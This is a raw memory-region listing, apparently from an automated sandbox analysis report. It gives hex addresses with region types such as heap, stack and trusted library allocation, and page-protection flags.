page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
2A344A53000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
2A344A39000
|
heap
|
page read and write
|
||
|
29B427D3000
|
heap
|
page read and write
|
||
|
2A344B1C000
|
trusted library allocation
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
29B429BE000
|
heap
|
page read and write
|
||
|
146351F0000
|
heap
|
page read and write
|
||
|
8E4DE83000
|
stack
|
page read and write
|
||
|
66E000
|
stack
|
page read and write
|
||
|
2A344C4A000
|
heap
|
page read and write
|
||
|
2A348E90000
|
trusted library allocation
|
page read and write
|
||
|
28820001000
|
trusted library allocation
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A3490F5000
|
trusted library allocation
|
page read and write
|
||
|
2A344C3C000
|
heap
|
page read and write
|
||
|
1463526B000
|
heap
|
page read and write
|
||
|
1463A800000
|
heap
|
page read and write
|
||
|
2A344C81000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
2A3445F8000
|
trusted library allocation
|
page read and write
|
||
|
1463AA70000
|
remote allocation
|
page read and write
|
||
|
2D70000
|
remote allocation
|
page read and write
|
||
|
2A344A24000
|
heap
|
page read and write
|
||
|
2A344BF0000
|
heap
|
page read and write
|
||
|
28822801000
|
trusted library allocation
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
2A348C3D000
|
heap
|
page read and write
|
||
|
2A344C3E000
|
heap
|
page read and write
|
||
|
2A344585000
|
trusted library allocation
|
page read and write
|
||
|
8E4E87C000
|
stack
|
page read and write
|
||
|
2A344ABE000
|
heap
|
page read and write
|
||
|
2A344C82000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2880C601000
|
trusted library allocation
|
page read and write
|
||
|
2A344C3F000
|
heap
|
page read and write
|
||
|
1463AA00000
|
trusted library allocation
|
page read and write
|
||
|
1463A700000
|
trusted library allocation
|
page read and write
|
||
|
2A344A57000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344A0F000
|
heap
|
page read and write
|
||
|
29B427EB000
|
heap
|
page read and write
|
||
|
2A344C83000
|
heap
|
page read and write
|
||
|
2A344C5C000
|
heap
|
page read and write
|
||
|
2A344A7D000
|
heap
|
page read and write
|
||
|
2A344B1C000
|
trusted library allocation
|
page read and write
|
||
|
1463A773000
|
trusted library allocation
|
page read and write
|
||
|
29B429BE000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
1463A650000
|
trusted library allocation
|
page read and write
|
||
|
766000
|
heap
|
page read and write
|
||
|
2A344C2C000
|
heap
|
page read and write
|
||
|
2A344C83000
|
heap
|
page read and write
|
||
|
2A344C3E000
|
heap
|
page read and write
|
||
|
4A9000
|
unkown
|
page read and write
|
||
|
2A344C82000
|
heap
|
page read and write
|
||
|
2A347DD9000
|
trusted library allocation
|
page read and write
|
||
|
2A344B18000
|
trusted library allocation
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A348C77000
|
heap
|
page read and write
|
||
|
2AD0000
|
unclassified section
|
page readonly
|
||
|
1463A8EE000
|
heap
|
page read and write
|
||
|
2A344A30000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
1463528C000
|
heap
|
page read and write
|
||
|
2A348C3D000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A348BFB000
|
heap
|
page read and write
|
||
|
4B9000
|
unkown
|
page readonly
|
||
|
8E4E5F8000
|
stack
|
page read and write
|
||
|
29B429B0000
|
heap
|
page read and write
|
||
|
2A344A53000
|
heap
|
page read and write
|
||
|
2343000
|
direct allocation
|
page read and write
|
||
|
2302000
|
direct allocation
|
page read and write
|
||
|
2A344C81000
|
heap
|
page read and write
|
||
|
704E7E000
|
stack
|
page read and write
|
||
|
2A344A19000
|
heap
|
page read and write
|
||
|
2A347DD1000
|
trusted library allocation
|
page read and write
|
||
|
2A3490F1000
|
trusted library allocation
|
page read and write
|
||
|
29B427C4000
|
heap
|
page read and write
|
||
|
2A344C54000
|
heap
|
page read and write
|
||
|
754000
|
heap
|
page read and write
|
||
|
2A344C25000
|
heap
|
page read and write
|
||
|
2A347EC2000
|
trusted library allocation
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
77C000
|
heap
|
page read and write
|
||
|
29B42787000
|
heap
|
page read and write
|
||
|
2334000
|
direct allocation
|
page read and write
|
||
|
14635266000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344BE0000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344A9D000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
29B4271E000
|
heap
|
page read and write
|
||
|
2A344A27000
|
heap
|
page read and write
|
||
|
2A344A2A000
|
heap
|
page read and write
|
||
|
A2F000
|
stack
|
page read and write
|
||
|
2A344A30000
|
heap
|
page read and write
|
||
|
1463A73C000
|
trusted library allocation
|
page read and write
|
||
|
2A344C3F000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
29B427D3000
|
heap
|
page read and write
|
||
|
2A344AE4000
|
trusted library allocation
|
page read and write
|
||
|
705F7E000
|
stack
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344A57000
|
heap
|
page read and write
|
||
|
1FFEA2A5000
|
heap
|
page read and write
|
||
|
2A344C41000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344A53000
|
heap
|
page read and write
|
||
|
2A3490F4000
|
trusted library allocation
|
page read and write
|
||
|
2A344C3E000
|
heap
|
page read and write
|
||
|
2A344A0A000
|
heap
|
page read and write
|
||
|
2A344C3E000
|
heap
|
page read and write
|
||
|
14635B1A000
|
heap
|
page read and write
|
||
|
2A344C3F000
|
heap
|
page read and write
|
||
|
8E4E27E000
|
stack
|
page read and write
|
||
|
1463A8FD000
|
heap
|
page read and write
|
||
|
29B427FF000
|
heap
|
page read and write
|
||
|
2A3445F8000
|
trusted library allocation
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344C3F000
|
heap
|
page read and write
|
||
|
2A344A15000
|
heap
|
page read and write
|
||
|
2A344A0F000
|
heap
|
page read and write
|
||
|
2A344A8A000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
29B427EC000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344A2E000
|
heap
|
page read and write
|
||
|
2A344C3A000
|
heap
|
page read and write
|
||
|
2A344C81000
|
heap
|
page read and write
|
||
|
2A347DF5000
|
trusted library allocation
|
page read and write
|
||
|
14635A15000
|
heap
|
page read and write
|
||
|
2A344B24000
|
trusted library allocation
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2ABE000
|
unclassified section
|
page write copy
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344C3E000
|
heap
|
page read and write
|
||
|
2A344C7C000
|
heap
|
page read and write
|
||
|
2A344C3E000
|
heap
|
page read and write
|
||
|
2A3490F9000
|
trusted library allocation
|
page read and write
|
||
|
1463A6C0000
|
trusted library allocation
|
page read and write
|
||
|
1463A6E8000
|
trusted library allocation
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
769000
|
heap
|
page read and write
|
||
|
2A348C70000
|
heap
|
page read and write
|
||
|
29B42994000
|
heap
|
page read and write
|
||
|
2A3445F8000
|
trusted library allocation
|
page read and write
|
||
|
2A348C5F000
|
heap
|
page read and write
|
||
|
7059FE000
|
unkown
|
page readonly
|
||
|
2A344ABE000
|
heap
|
page read and write
|
||
|
8E4E679000
|
stack
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
8E4F44B000
|
stack
|
page read and write
|
||
|
14635213000
|
heap
|
page read and write
|
||
|
2A344A8A000
|
heap
|
page read and write
|
||
|
2A344AE4000
|
trusted library allocation
|
page read and write
|
||
|
1463A6E5000
|
trusted library allocation
|
page read and write
|
||
|
146352B4000
|
heap
|
page read and write
|
||
|
2A347DD7000
|
trusted library allocation
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
756000
|
heap
|
page read and write
|
||
|
8E4E6FE000
|
stack
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
8E4F34D000
|
stack
|
page read and write
|
||
|
7044FE000
|
unkown
|
page readonly
|
||
|
29B4280E000
|
heap
|
page read and write
|
||
|
146362B0000
|
trusted library section
|
page readonly
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344C41000
|
heap
|
page read and write
|
||
|
1463A6D0000
|
trusted library allocation
|
page read and write
|
||
|
29B42889000
|
heap
|
page read and write
|
||
|
29B42737000
|
heap
|
page read and write
|
||
|
2A344C5C000
|
heap
|
page read and write
|
||
|
2A344C3A000
|
heap
|
page read and write
|
||
|
1463A902000
|
heap
|
page read and write
|
||
|
2A3490F9000
|
trusted library allocation
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344C3C000
|
heap
|
page read and write
|
||
|
2A344C0E000
|
heap
|
page read and write
|
||
|
2A3445EC000
|
trusted library allocation
|
page read and write
|
||
|
2A344C82000
|
heap
|
page read and write
|
||
|
2A344AB1000
|
heap
|
page read and write
|
||
|
2A344A2E000
|
heap
|
page read and write
|
||
|
9E138FE000
|
stack
|
page read and write
|
||
|
1463A8C1000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344C5A000
|
heap
|
page read and write
|
||
|
29B4280E000
|
heap
|
page read and write
|
||
|
2A3449DA000
|
heap
|
page read and write
|
||
|
28809401000
|
trusted library allocation
|
page read and write
|
||
|
2A344C83000
|
heap
|
page read and write
|
||
|
2A344C7C000
|
heap
|
page read and write
|
||
|
2A344C82000
|
heap
|
page read and write
|
||
|
2A344C5C000
|
heap
|
page read and write
|
||
|
2351000
|
direct allocation
|
page read and write
|
||
|
2A344A13000
|
heap
|
page read and write
|
||
|
2A344C21000
|
heap
|
page read and write
|
||
|
782000
|
heap
|
page read and write
|
||
|
2A344A9E000
|
heap
|
page read and write
|
||
|
2A344A57000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2309000
|
direct allocation
|
page read and write
|
||
|
1463A8FF000
|
heap
|
page read and write
|
||
|
2A3490F9000
|
trusted library allocation
|
page read and write
|
||
|
1463A7CC000
|
trusted library allocation
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
1463A7B0000
|
trusted library allocation
|
page read and write
|
||
|
2A344A17000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344A02000
|
heap
|
page read and write
|
||
|
29B429BE000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
1463A90A000
|
heap
|
page read and write
|
||
|
2A3490F0000
|
trusted library allocation
|
page read and write
|
||
|
2A344A57000
|
heap
|
page read and write
|
||
|
2A344C29000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A348C73000
|
heap
|
page read and write
|
||
|
146352FD000
|
heap
|
page read and write
|
||
|
2A344604000
|
trusted library allocation
|
page read and write
|
||
|
1463AA10000
|
trusted library allocation
|
page read and write
|
||
|
29B427D3000
|
heap
|
page read and write
|
||
|
2A344C3E000
|
heap
|
page read and write
|
||
|
1463A726000
|
trusted library allocation
|
page read and write
|
||
|
2A344C3A000
|
heap
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
1463AA70000
|
remote allocation
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
1463A7D7000
|
trusted library allocation
|
page read and write
|
||
|
2A3490C1000
|
trusted library allocation
|
page read and write
|
||
|
1463A6B0000
|
trusted library allocation
|
page read and write
|
||
|
2A344C76000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
29B42710000
|
heap
|
page read and write
|
||
|
788000
|
heap
|
page read and write
|
||
|
2A344AEC000
|
trusted library allocation
|
page read and write
|
||
|
2A3445A0000
|
trusted library allocation
|
page read and write
|
||
|
2A344C5C000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344A53000
|
heap
|
page read and write
|
||
|
2A344568000
|
trusted library allocation
|
page read and write
|
||
|
2A344C3F000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344C3E000
|
heap
|
page read and write
|
||
|
2A344B1C000
|
trusted library allocation
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
1463A81F000
|
heap
|
page read and write
|
||
|
2A344C29000
|
heap
|
page read and write
|
||
|
8E4E577000
|
stack
|
page read and write
|
||
|
2A344C21000
|
heap
|
page read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
1463A854000
|
heap
|
page read and write
|
||
|
1463A742000
|
trusted library allocation
|
page read and write
|
||
|
2A344580000
|
trusted library allocation
|
page read and write
|
||
|
28808A01000
|
trusted library allocation
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A3490F9000
|
trusted library allocation
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
2A344A2A000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
14635110000
|
heap
|
page read and write
|
||
|
9E13CFE000
|
stack
|
page read and write
|
||
|
29B42753000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
704FFE000
|
unkown
|
page readonly
|
||
|
2A344C76000
|
heap
|
page read and write
|
||
|
2A344C3F000
|
heap
|
page read and write
|
||
|
7049FC000
|
stack
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A3490F2000
|
trusted library allocation
|
page read and write
|
||
|
28820A01000
|
trusted library allocation
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
2A344C4A000
|
heap
|
page read and write
|
||
|
7055FE000
|
unkown
|
page readonly
|
||
|
29B42806000
|
heap
|
page read and write
|
||
|
75C000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
1FFE9F60000
|
heap
|
page read and write
|
||
|
2A344C3F000
|
heap
|
page read and write
|
||
|
2A3445FD000
|
trusted library allocation
|
page read and write
|
||
|
4A9000
|
unkown
|
page write copy
|
||
|
2A344A2E000
|
heap
|
page read and write
|
||
|
1463528E000
|
heap
|
page read and write
|
||
|
29B42990000
|
heap
|
page read and write
|
||
|
2A344AA0000
|
heap
|
page read and write
|
||
|
2A344C54000
|
heap
|
page read and write
|
||
|
2A3445A9000
|
trusted library allocation
|
page read and write
|
||
|
29B427E7000
|
heap
|
page read and write
|
||
|
2A348C3E000
|
heap
|
page read and write
|
||
|
1463A75E000
|
trusted library allocation
|
page read and write
|
||
|
7053F9000
|
stack
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A348BD0000
|
heap
|
page read and write
|
||
|
704DFE000
|
unkown
|
page readonly
|
||
|
2A344A39000
|
heap
|
page read and write
|
||
|
2A344A24000
|
heap
|
page read and write
|
||
|
2A344C82000
|
heap
|
page read and write
|
||
|
2A344C3F000
|
heap
|
page read and write
|
||
|
2A344B18000
|
trusted library allocation
|
page read and write
|
||
|
2A344C7A000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344A57000
|
heap
|
page read and write
|
||
|
2A344C3A000
|
heap
|
page read and write
|
||
|
2A344C82000
|
heap
|
page read and write
|
||
|
2A344C3F000
|
heap
|
page read and write
|
||
|
78A000
|
heap
|
page read and write
|
||
|
2A344A25000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
29B427EA000
|
heap
|
page read and write
|
||
|
92F000
|
stack
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A348F5B000
|
trusted library allocation
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
1463A710000
|
trusted library allocation
|
page read and write
|
||
|
BFE000
|
stack
|
page read and write
|
||
|
2A347E70000
|
trusted library allocation
|
page read and write
|
||
|
2A344C3A000
|
heap
|
page read and write
|
||
|
2A344C3E000
|
heap
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
1463523F000
|
heap
|
page read and write
|
||
|
29B429BE000
|
heap
|
page read and write
|
||
|
6D0000
|
direct allocation
|
page execute and read and write
|
||
|
2A344A0B000
|
heap
|
page read and write
|
||
|
2A348C76000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
14636270000
|
trusted library section
|
page readonly
|
||
|
2A344C3C000
|
heap
|
page read and write
|
||
|
1463A8F6000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344C82000
|
heap
|
page read and write
|
||
|
2A348C72000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344A13000
|
heap
|
page read and write
|
||
|
2A348C5F000
|
heap
|
page read and write
|
||
|
2A344C3A000
|
heap
|
page read and write
|
||
|
795000
|
heap
|
page read and write
|
||
|
2A348E10000
|
trusted library allocation
|
page read and write
|
||
|
2A344A39000
|
heap
|
page read and write
|
||
|
7040F7000
|
stack
|
page read and write
|
||
|
2A3490F9000
|
trusted library allocation
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344C82000
|
heap
|
page read and write
|
||
|
2A344A11000
|
heap
|
page read and write
|
||
|
76B000
|
heap
|
page read and write
|
||
|
2A344A13000
|
heap
|
page read and write
|
||
|
2A344B18000
|
trusted library allocation
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344C76000
|
heap
|
page read and write
|
||
|
2880ED69000
|
trusted library allocation
|
page read and write
|
||
|
8E4E3FD000
|
stack
|
page read and write
|
||
|
2A344C76000
|
heap
|
page read and write
|
||
|
2A3490F9000
|
trusted library allocation
|
page read and write
|
||
|
2A344C30000
|
heap
|
page read and write
|
||
|
14635B13000
|
heap
|
page read and write
|
||
|
2A3445F0000
|
trusted library allocation
|
page read and write
|
||
|
2A344C3A000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
14635A02000
|
heap
|
page read and write
|
||
|
2318000
|
direct allocation
|
page read and write
|
||
|
1463526F000
|
heap
|
page read and write
|
||
|
2A344A04000
|
heap
|
page read and write
|
||
|
2A344A0D000
|
heap
|
page read and write
|
||
|
2A344C3F000
|
heap
|
page read and write
|
||
|
1463A6DE000
|
trusted library allocation
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344C5C000
|
heap
|
page read and write
|
||
|
2A70000
|
heap
|
page read and write
|
||
|
9E136CD000
|
stack
|
page read and write
|
||
|
28809E01000
|
trusted library allocation
|
page read and write
|
||
|
2A344650000
|
trusted library allocation
|
page read and write
|
||
|
1463A82C000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344C5A000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344A53000
|
heap
|
page read and write
|
||
|
29B429B6000
|
heap
|
page read and write
|
||
|
2A3490F7000
|
trusted library allocation
|
page read and write
|
||
|
78C000
|
heap
|
page read and write
|
||
|
1463A640000
|
trusted library allocation
|
page read and write
|
||
|
2A344AEC000
|
trusted library allocation
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344C76000
|
heap
|
page read and write
|
||
|
2A344C7C000
|
heap
|
page read and write
|
||
|
8E4DFCF000
|
stack
|
page read and write
|
||
|
1463A820000
|
trusted library allocation
|
page read and write
|
||
|
2A348F13000
|
trusted library allocation
|
page read and write
|
||
|
2A348BF3000
|
heap
|
page read and write
|
||
|
704EFE000
|
unkown
|
page readonly
|
||
|
2A344A53000
|
heap
|
page read and write
|
||
|
1463A830000
|
trusted library allocation
|
page read and write
|
||
|
2A344C3F000
|
heap
|
page read and write
|
||
|
2A344C3C000
|
heap
|
page read and write
|
||
|
2A344C82000
|
heap
|
page read and write
|
||
|
14635B00000
|
heap
|
page read and write
|
||
|
29B42737000
|
heap
|
page read and write
|
||
|
2A348DD0000
|
trusted library allocation
|
page read and write
|
||
|
2A344A0D000
|
heap
|
page read and write
|
||
|
2A344C76000
|
heap
|
page read and write
|
||
|
1463A770000
|
trusted library allocation
|
page read and write
|
||
|
2A348F3F000
|
trusted library allocation
|
page read and write
|
||
|
730000
|
heap
|
page read and write
|
||
|
2A344C25000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
14636190000
|
trusted library allocation
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A3445E0000
|
trusted library allocation
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344C7B000
|
heap
|
page read and write
|
||
|
2A344C4A000
|
heap
|
page read and write
|
||
|
1FFEA2A0000
|
heap
|
page read and write
|
||
|
1463525B000
|
heap
|
page read and write
|
||
|
1463A7A0000
|
trusted library allocation
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344C5A000
|
heap
|
page read and write
|
||
|
2360000
|
trusted library allocation
|
page read and write
|
||
|
2A348F40000
|
trusted library allocation
|
page read and write
|
||
|
2A3C000
|
stack
|
page read and write
|
||
|
704F7E000
|
stack
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344C76000
|
heap
|
page read and write
|
||
|
2A347E05000
|
trusted library allocation
|
page read and write
|
||
|
2A344C4A000
|
heap
|
page read and write
|
||
|
14635228000
|
heap
|
page read and write
|
||
|
2A344C3E000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
6B0000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
8E4F24E000
|
stack
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
231F000
|
direct allocation
|
page read and write
|
||
|
2A344C3C000
|
heap
|
page read and write
|
||
|
2A344C77000
|
heap
|
page read and write
|
||
|
2ABB000
|
unclassified section
|
page readonly
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
1463A6F0000
|
trusted library allocation
|
page read and write
|
||
|
2A344A0A000
|
heap
|
page read and write
|
||
|
775000
|
heap
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
2A3490F9000
|
trusted library allocation
|
page read and write
|
||
|
14636290000
|
trusted library section
|
page readonly
|
||
|
146352B0000
|
heap
|
page read and write
|
||
|
2A344C79000
|
heap
|
page read and write
|
||
|
2A344C3E000
|
heap
|
page read and write
|
||
|
2A3490F6000
|
trusted library allocation
|
page read and write
|
||
|
2A344B24000
|
trusted library allocation
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344A15000
|
heap
|
page read and write
|
||
|
2A344C79000
|
heap
|
page read and write
|
||
|
2A348E70000
|
trusted library allocation
|
page read and write
|
||
|
70557E000
|
stack
|
page read and write
|
||
|
2A348F60000
|
trusted library allocation
|
page read and write
|
||
|
2A348BF8000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344A0D000
|
heap
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
2A344C5C000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344AAB000
|
heap
|
page read and write
|
||
|
2A344C82000
|
heap
|
page read and write
|
||
|
704AFE000
|
unkown
|
page readonly
|
||
|
2A347DD5000
|
trusted library allocation
|
page read and write
|
||
|
2A344C81000
|
heap
|
page read and write
|
||
|
9E139FD000
|
stack
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344AB2000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
2A344C29000
|
heap
|
page read and write
|
||
|
29B427EA000
|
heap
|
page read and write
|
||
|
14636611000
|
trusted library allocation
|
page read and write
|
||
|
29B42787000
|
heap
|
page read and write
|
||
|
2742000
|
heap
|
page read and write
|
||
|
14636280000
|
trusted library section
|
page readonly
|
||
|
4B5000
|
unkown
|
page read and write
|
||
|
2A344C81000
|
heap
|
page read and write
|
||
|
29B427C4000
|
heap
|
page read and write
|
||
|
754000
|
heap
|
page read and write
|
||
|
2A3445EC000
|
trusted library allocation
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
70527E000
|
stack
|
page read and write
|
||
|
2A344A17000
|
heap
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
29B427FE000
|
heap
|
page read and write
|
||
|
14635293000
|
heap
|
page read and write
|
||
|
2C1E000
|
stack
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
29B42802000
|
heap
|
page read and write
|
||
|
2A344A30000
|
heap
|
page read and write
|
||
|
2A344754000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
2A344C76000
|
heap
|
page read and write
|
||
|
2A348BD7000
|
heap
|
page read and write
|
||
|
2A344A17000
|
heap
|
page read and write
|
||
|
1463A7A0000
|
trusted library allocation
|
page read and write
|
||
|
2AEA000
|
trusted library allocation
|
page read and write
|
||
|
2A3444D0000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344C3F000
|
heap
|
page read and write
|
||
|
2A344A04000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
1463A861000
|
heap
|
page read and write
|
||
|
2A344A17000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A348BEE000
|
heap
|
page read and write
|
||
|
2A34A670000
|
heap
|
page read and write
|
||
|
2A344C25000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2A344B24000
|
trusted library allocation
|
page read and write
|
||
|
2A344C7C000
|
heap
|
page read and write
|
||
|
2A344A84000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344C32000
|
heap
|
page read and write
|
||
|
2A344C29000
|
heap
|
page read and write
|
||
|
1463A7EA000
|
trusted library allocation
|
page read and write
|
||
|
7058FB000
|
stack
|
page read and write
|
||
|
2A348C4F000
|
heap
|
page read and write
|
||
|
7052FE000
|
unkown
|
page readonly
|
||
|
2A344A9D000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2D70000
|
remote allocation
|
page read and write
|
||
|
2A344C77000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A349110000
|
trusted library allocation
|
page execute
|
||
|
14635B1A000
|
heap
|
page read and write
|
||
|
29B4288E000
|
heap
|
page read and write
|
||
|
2A344650000
|
trusted library allocation
|
page read and write
|
||
|
2A348DF0000
|
trusted library allocation
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2B1E000
|
stack
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
2A344C5C000
|
heap
|
page read and write
|
||
|
2A344C7C000
|
heap
|
page read and write
|
||
|
2A344C55000
|
heap
|
page read and write
|
||
|
2A3490F9000
|
trusted library allocation
|
page read and write
|
||
|
2A344C83000
|
heap
|
page read and write
|
||
|
7050FE000
|
unkown
|
page readonly
|
||
|
9E137FE000
|
stack
|
page read and write
|
||
|
29B42762000
|
heap
|
page read and write
|
||
|
1463A761000
|
trusted library allocation
|
page read and write
|
||
|
2A344A0F000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
29B427B7000
|
heap
|
page read and write
|
||
|
1463A841000
|
heap
|
page read and write
|
||
|
2A3449D8000
|
heap
|
page read and write
|
||
|
2A344C3A000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
29B42762000
|
heap
|
page read and write
|
||
|
2A348C7A000
|
heap
|
page read and write
|
||
|
146352BB000
|
heap
|
page read and write
|
||
|
2A81000
|
unclassified section
|
page execute read
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344C3F000
|
heap
|
page read and write
|
||
|
2A348BF7000
|
heap
|
page read and write
|
||
|
2A344C76000
|
heap
|
page read and write
|
||
|
1463AA20000
|
trusted library allocation
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344ABE000
|
heap
|
page read and write
|
||
|
2A344A30000
|
heap
|
page read and write
|
||
|
2880B201000
|
trusted library allocation
|
page read and write
|
||
|
14635990000
|
trusted library section
|
page read and write
|
||
|
2A348ED0000
|
